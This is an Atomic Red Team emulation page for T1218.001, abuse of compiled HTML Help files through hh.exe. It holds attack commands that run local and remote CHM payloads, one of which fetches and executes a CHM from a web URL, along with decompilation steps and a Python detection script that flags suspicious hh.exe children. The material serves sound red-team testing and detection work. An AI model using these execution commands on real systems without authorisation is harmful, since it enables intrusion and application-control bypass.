# T1218.001 - Compiled HTML File
Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such as VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

A custom CHM file containing embedded payloads could be delivered to a victim and then triggered by User Execution. CHM execution may also bypass application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
## Atomic Tests
### Atomic Test #1 - Compiled HTML Help Local Payload
Uses hh.exe to execute a local compiled HTML Help payload. Upon execution calc.exe will open.

Supported Platforms: windows

#### Dependencies: Run with powershell
##### Description: The payload must exist on disk at specified location (#{local_chm_file})
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1218.001\src\T1218.001.chm") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.001\src\T1218.001.chm") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "PathToAtomicsFolder\T1218.001\src\T1218.001.chm"
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 1 -GetPreReqs
```
#### Attack Commands: Run with command_prompt
```cmd
hh.exe "PathToAtomicsFolder\T1218.001\src\T1218.001.chm"
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 1
```
### Atomic Test #2 - Compiled HTML Help Remote Payload
Uses hh.exe to execute a remote compiled HTML Help payload. Upon execution, an error is displayed saying the file cannot be opened.

Supported Platforms: windows

#### Attack Commands: Run with command_prompt
```cmd
hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 2
```
### Atomic Test #3 - Invoke CHM with default Shortcut Command Execution
Executes a CHM file with the default Shortcut Command method.

Supported Platforms: windows

#### Dependencies: Run with powershell
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 3 -GetPreReqs
```
#### Attack Commands: Run with powershell
```powershell
Invoke-ATHCompiledHelp -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 3
```
### Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler
Executes a CHM file with the ITS protocol handler.

Supported Platforms: windows

#### Dependencies: Run with powershell
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 4 -GetPreReqs
```
#### Attack Commands: Run with powershell
```powershell
Invoke-ATHCompiledHelp -InfoTechStorageHandler its -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 4
```
### Atomic Test #5 - Invoke CHM Simulate Double click
Executes a CHM file simulating a user double click.

Supported Platforms: windows

#### Dependencies: Run with powershell
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 5 -GetPreReqs
```
#### Attack Commands: Run with powershell
```powershell
Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath Test.chm
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 5
```
### Atomic Test #6 - Invoke CHM with Script Engine and Help Topic
Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension.

Supported Platforms: windows

#### Dependencies: Run with powershell
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 6 -GetPreReqs
```
#### Attack Commands: Run with powershell
```powershell
Invoke-ATHCompiledHelp -ScriptEngine JScript -InfoTechStorageHandler its -TopicExtension html -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 6
```
### Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic
Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler and help topic extension.

Supported Platforms: windows

#### Dependencies: Run with powershell
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 7 -GetPreReqs
```
#### Attack Commands: Run with powershell
```powershell
Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler its -TopicExtension html -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 7
```
### Atomic Test #8 - Decompile Local CHM File
Uses hh.exe to decompile a local compiled HTML Help file. Upon successful execution the chm file will decompile to disk.

Reference: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

Supported Platforms: windows

#### Dependencies: Run with powershell
##### Description: The payload must exist on disk at specified location (#{local_chm_file})
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1218.001\src\T1218.001.chm") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.001\src\T1218.001.chm") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "PathToAtomicsFolder\T1218.001\src\T1218.001.chm"
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 8 -GetPreReqs
```
#### Attack Commands: Run with command_prompt
```cmd
hh.exe -decompile %temp% "PathToAtomicsFolder\T1218.001\src\T1218.001.chm"
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 8
```
#### Cleanup:
```cmd
del %temp%\T1218.001.html >nul 2>&1
```
```powershell
Invoke-AtomicTest T1218.001 -TestNumbers 8 -Cleanup
```
## Detection
Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.
Monitor presence and use of CHM files, especially if they are not typically used within an environment.
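As an added example that is not part of the original page or the Atomic Red Team project, the triage logic described above applied to constructed process-creation records: it flags hh.exe invocations whose arguments fall outside a known-good baseline or carry a remote URL, an ITS protocol handler or -decompile (the behaviours exercised by tests 2, 4, 6, 7 and 8), and child processes whose parent is hh.exe. The record layout, the baseline regex and the child-process list are assumptions to be replaced with the environment's own history.

```python
import re
import ntpath

# Constructed Sysmon-style process-creation records (sample data, not real telemetry).
EVENTS = [
    {"pid": 1, "image": r"C:\Windows\hh.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Program Files\Vendor\help.chm'},
    {"pid": 2, "image": r"C:\Windows\hh.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"hh.exe https://example.invalid/T1218.001.chm"},
    {"pid": 3, "image": r"C:\Windows\hh.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"hh.exe -decompile C:\Users\u\AppData\Local\Temp C:\Users\u\Downloads\T1218.001.chm"},
    {"pid": 4, "image": r"C:\Windows\hh.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"hh.exe its:C:\Users\u\Downloads\Test.chm::/Test.html"},
    {"pid": 5, "image": r"C:\Windows\System32\calc.exe", "parent_image": r"C:\Windows\hh.exe",
     "cmdline": "calc.exe"},
]

# Assumed known-good baseline: CHM files opened from vendor/system help directories.
# In practice this is built from the environment's own history of hh.exe arguments.
KNOWN_GOOD = [re.compile(r'^"?[a-z]:\\(program files( \(x86\))?|windows\\help)\\.*\.chm"?$', re.I)]
# Assumed list of children a help viewer has no business launching.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "calc.exe"}


def assess(ev):
    """Return the reasons one process-creation record is flagged (empty list = nothing flagged)."""
    reasons = []
    image = ntpath.basename(ev["image"]).lower()
    parent = ntpath.basename(ev["parent_image"]).lower()
    cmd = ev["cmdline"]
    if image == "hh.exe":
        args = cmd.split(None, 1)[1] if " " in cmd else ""  # naive split: everything after the executable
        if re.search(r"\bhttps?://", args, re.I):
            reasons.append("hh.exe given a remote URL")
        if re.search(r"\b(ms-)?its:", args, re.I):
            reasons.append("ITS protocol handler in arguments")
        if re.search(r"(^|\s)-decompile\b", args, re.I):
            reasons.append("hh.exe -decompile: CHM unpacked to disk")
        if args and not any(p.match(args) for p in KNOWN_GOOD):
            reasons.append("arguments outside known-good baseline")
    if parent == "hh.exe" and image in SUSPICIOUS_CHILDREN:
        reasons.append(f"hh.exe spawned {image}")
    return reasons


def scan(events):
    """Map pid -> reasons for every flagged record; unflagged records are omitted."""
    return {ev["pid"]: r for ev in events if (r := assess(ev))}
```

Feed `scan` the same fields from real Sysmon Event ID 1 or Windows 4688 records and tune the baseline until the legitimate help-file invocations in your environment return an empty list.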